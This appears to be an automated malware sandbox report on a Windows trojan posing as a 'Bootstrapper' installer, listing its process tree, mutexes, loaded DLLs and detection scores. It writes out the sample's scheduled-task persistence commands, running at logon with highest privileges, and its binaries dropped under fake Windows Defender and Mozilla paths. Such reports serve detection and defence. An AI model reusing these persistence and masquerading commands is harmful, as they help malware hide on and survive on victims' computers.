Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E100B7	3_2_00E100B7
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E14088	3_2_00E14088
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E251C9	3_2_00E251C9
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E17153	3_2_00E17153
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E032F7	3_2_00E032F7
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E162CA	3_2_00E162CA
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E143BF	3_2_00E143BF
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E0F461	3_2_00E0F461
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E2D440	3_2_00E2D440
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E0C426	3_2_00E0C426
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E177EF	3_2_00E177EF
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E2D8EE	3_2_00E2D8EE
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E0286B	3_2_00E0286B
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E319F4	3_2_00E319F4
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E0E9B7	3_2_00E0E9B7
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E16CDC	3_2_00E16CDC
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E13E0B	3_2_00E13E0B
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E0EFE2	3_2_00E0EFE2
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E24F9A	3_2_00E24F9A
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Code function: 8_2_00007FFD9B627390	8_2_00007FFD9B627390
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Code function: 8_2_00007FFD9B627270	8_2_00007FFD9B627270
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Code function: 8_2_00007FFD9B637140	8_2_00007FFD9B637140
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Code function: 8_2_00007FFD9B632E2A	8_2_00007FFD9B632E2A
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B640D48	22_2_00007FFD9B640D48
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B640E43	22_2_00007FFD9B640E43
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B7A1129	22_2_00007FFD9B7A1129
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B9E9F12	22_2_00007FFD9B9E9F12
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 22_2_00007FFD9B9E9136	22_2_00007FFD9B9E9136
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 44_2_00007FFD9B630D48	44_2_00007FFD9B630D48
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 44_2_00007FFD9B630E43	44_2_00007FFD9B630E43
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 45_2_00007FFD9B660981	45_2_00007FFD9B660981
Source: C:\monitordll\componentreviewsavesSession.exe	Code function: 45_2_00007FFD9B642B2D	45_2_00007FFD9B642B2D

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: String function: 00E1EB78 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: String function: 00E1EC50 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: String function: 00E1F5F0 appears 31 times

Source: C:\Users\user\Desktop\BootstrapperV1.23.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7772 -s 2200

Source: KKjubdmzCR.exe	Binary or memory string: OriginalFilename vs KKjubdmzCR.exe
Source: KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs KKjubdmzCR.exe
Source: KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs KKjubdmzCR.exe
Source: KKjubdmzCR.exe, 00000000.00000002.1826491667.0000000000992000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs KKjubdmzCR.exe

Source: KKjubdmzCR.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, TCF9s2mMGQrBwEfst4M.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, TCF9s2mMGQrBwEfst4M.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, TCF9s2mMGQrBwEfst4M.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, TCF9s2mMGQrBwEfst4M.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@60/36@5/5

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Code function: 3_2_00E06C74 GetLastError,FormatMessageW,

3_2_00E06C74

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Code function: 3_2_00E1A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

3_2_00E1A6C2

Source: C:\monitordll\componentreviewsavesSession.exe

File created: C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe

Source: C:\Users\user\Desktop\KKjubdmzCR.exe

File created: C:\Users\user\Desktop\Bootstrapper.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\monitordll\componentreviewsavesSession.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7772
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\monitordll\componentreviewsavesSession.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-pSeVGVkt0bF1Du5Q58H8
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03

Source: C:\Users\user\Desktop\KKjubdmzCR.exe

File created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\monitordll\bgx0Ow.bat" "

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Command line argument: sfxname	3_2_00E1DF1E
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Command line argument: sfxstime	3_2_00E1DF1E
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Command line argument: STARTDLG	3_2_00E1DF1E
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Command line argument: xz	3_2_00E1DF1E

Source: KKjubdmzCR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\KKjubdmzCR.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\KKjubdmzCR.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: KKjubdmzCR.exe	ReversingLabs: Detection: 81%
Source: KKjubdmzCR.exe	Virustotal: Detection: 66%

Source: KKjubdmzCR.exe	String found in binary or memory: /silent /install
Source: KKjubdmzCR.exe	String found in binary or memory: /install /quiet /norestart
Source: KKjubdmzCR.exe	String found in binary or memory: [!] Error getting from primary endpoint: --START ERROR INFO-- Exception:
Source: KKjubdmzCR.exe	String found in binary or memory: [!] Error getting from secondary endpoint: --START ERROR INFO-- Exception:

Source: unknown	Process created: C:\Users\user\Desktop\KKjubdmzCR.exe "C:\Users\user\Desktop\KKjubdmzCR.exe"
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Process created: C:\Users\user\Desktop\Bootstrapper.exe "C:\Users\user\Desktop\Bootstrapper.exe"
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Process created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe"
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\monitordll\2mpoFrNBWk.vbe"
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process created: C:\Users\user\Desktop\BootstrapperV1.23.exe "C:\Users\user\Desktop\BootstrapperV1.23.exe" --oldBootstrapper "C:\Users\user\Desktop\Bootstrapper.exe" --isUpdate true
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7772 -s 2200
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\monitordll\bgx0Ow.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\monitordll\componentreviewsavesSession.exe "C:\monitordll/componentreviewsavesSession.exe"
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 11 /tr "'C:\Recovery\wmnXYZRZEK.exe'" /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wmnXYZRZEK" /sc ONLOGON /tr "'C:\Recovery\wmnXYZRZEK.exe'" /rl HIGHEST /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 12 /tr "'C:\Recovery\wmnXYZRZEK.exe'" /rl HIGHEST /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC1DD.tmp" "c:\Windows\System32\CSC7999042AC4784EED922BD982607A7FA2.TMP"
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\wmnXYZRZEK.exe'" /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wmnXYZRZEK" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\wmnXYZRZEK.exe'" /rl HIGHEST /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\wmnXYZRZEK.exe'" /rl HIGHEST /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe'" /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SIHClient" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe'" /rl HIGHEST /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe'" /rl HIGHEST /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe'" /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe'" /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wmnXYZRZEK" /sc ONLOGON /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe'" /rl HIGHEST /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe'" /rl HIGHEST /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "componentreviewsavesSessionc" /sc MINUTE /mo 14 /tr "'C:\monitordll\componentreviewsavesSession.exe'" /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "componentreviewsavesSession" /sc ONLOGON /tr "'C:\monitordll\componentreviewsavesSession.exe'" /rl HIGHEST /f
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "componentreviewsavesSessionc" /sc MINUTE /mo 6 /tr "'C:\monitordll\componentreviewsavesSession.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\monitordll\componentreviewsavesSession.exe C:\monitordll\componentreviewsavesSession.exe
Source: unknown	Process created: C:\monitordll\componentreviewsavesSession.exe C:\monitordll\componentreviewsavesSession.exe
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\R1OpfLIrNP.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Process created: C:\Users\user\Desktop\Bootstrapper.exe "C:\Users\user\Desktop\Bootstrapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Process created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process created: C:\Users\user\Desktop\BootstrapperV1.23.exe "C:\Users\user\Desktop\BootstrapperV1.23.exe" --oldBootstrapper "C:\Users\user\Desktop\Bootstrapper.exe" --isUpdate true	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\monitordll\2mpoFrNBWk.vbe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\monitordll\bgx0Ow.bat" "	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\monitordll\componentreviewsavesSession.exe "C:\monitordll/componentreviewsavesSession.exe"
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline"
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\R1OpfLIrNP.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC1DD.tmp" "c:\Windows\System32\CSC7999042AC4784EED922BD982607A7FA2.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: rsaenh.dll	Jump to behavior
